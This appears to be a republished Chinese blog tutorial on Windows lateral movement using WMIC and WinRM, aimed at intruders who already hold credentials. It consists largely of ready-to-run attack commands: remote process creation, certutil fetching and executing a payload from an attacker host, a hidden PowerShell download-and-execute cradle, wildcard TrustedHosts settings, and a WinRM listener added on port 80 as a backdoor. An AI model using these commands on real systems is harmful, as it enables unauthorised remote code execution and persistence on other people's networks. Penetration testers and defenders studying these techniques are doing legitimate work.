标签：20 Windows winrm winRM 横向 192.168 5985 端口 WinRM

一、利用WMIC（当目标机器只开启135端口）：

 

 

    windows除了cmd ，powershell以外另一个更为强大的命令执行shell——WMIC，WMIC其实就是WMI的管理工具。WMI（Windows Management Instrumentation,Windows 管理规范）是一项核心的 Windows 管理技术；用户可以使用 WMI 管理本地和远程计算机。

 

  Shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create “<后门文件或者命令>”

 

 

  由于只开启了135端口，所以这里无法通过ls查看的具体情况的（445没开），但我们上帝视角切到靶机发现确实是执行命令了的

 

 

  同时又因为没开445端口，这时候我们就需要特殊的方法上传文件让它上线了。

 

1、certutil上线

 

①先创建一个提供下载的地址

 

 

 

②让目标机器去我们上一步创建的链接下载文件：

shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create "certutil -urlcache -split -f http://192.168.1.50:80/a c:\certutil.exe"

 

③执行所下载的文件：

shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create "cmd.exe /c c:\certutil.exe"

 

 

 

 

2、其他方法：

 

①利用powershell一步到位：

  Shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘192.168.1.3:8080/a/b’))\””

 

②通过bitsadmin

 

③通过共享文件上传

    万一对方也开了445端口，那就把文件放到共享文件夹。通过net use再copy过去执行 。

 

③echo

    这是没有办法的办法了，把二进制转换为base64然后echo进目标机器，然后再解码运行。

 

 

二、利用WinRM（目标机器开启5985端口）：

 

 

WinRM（Windows Remote Management）是Windows对WS-Management的实现，WinRM允许远程用户使用工具和脚本对Windows服务器进行管理并获取数据。

Web服务管理协议（WS-Management，Web Services-Management）是一种基于SOAP协议的DMTF开放标准，用于对服务器等网络设备以及各种Web应用程序进行管理。

如果拿到一台机器，经过凭证等信息收集后，但是再次探测发现目标机器已经不开3389，只开了5985端口时，就可以用WinRM了

 

1、初始化服务：

由于初始化需要交互界面，所以建议开了代理之后再操作。

此外，网络连接类型不能是公用网络类型，可以是家庭或者工作。

 

再目标机器上初始化：

winrm qc

or

winrm quickconfig -q

 

2、设置信任主机：

    接下来就是在攻击机上操作了，要确保发起连接的主机与目标主机处于同一域或者两台主机的WinRM服务TrustedHosts中必须存在对方主机的IP或主机名

 

winrm set winrm/config/Client @{TrustedHosts="*"}

winrm set winrm/config/Client @{TrustedHosts="*.baidu.com"}

winrm set winrm/config/Client @{TrustedHosts="*.baidu.com,192.168.1.4"}

 

winrm get winrm/config/client|findstr TrustedHosts

 

3、执行命令：

 

winrs -r:http://192.168.2.10:5985 -u:administrator -p:admin whoami

winrs -r:http://192.168.2.11:5985 -u:allen -p:132414 whoami

winrs -r:http://192.168.2.40:5985 -u:administrator -p:132414abc! whoami

 

 

4、注意：

    Win7-10都可以使用，rid非500也可以，不需要添加注册表。但是不能是公用网络，同时需要互为信任的主机（在第2步设置）

 

5、半个后门：

    对于目标机器是Windows Server 2012以上的服务器操作系统中，WinRM服务默认启动并监听了5985端口。通过下面的命令，可以新增WinRM一个80端口的监听（注意这条命令是事先在目标机器上敲的）：

 

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

 

 

标签：20,Windows,winrm,winRM,横向,192.168,5985,端口,WinRM
来源： https://www.cnblogs.com/Thorndike/p/15834968.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。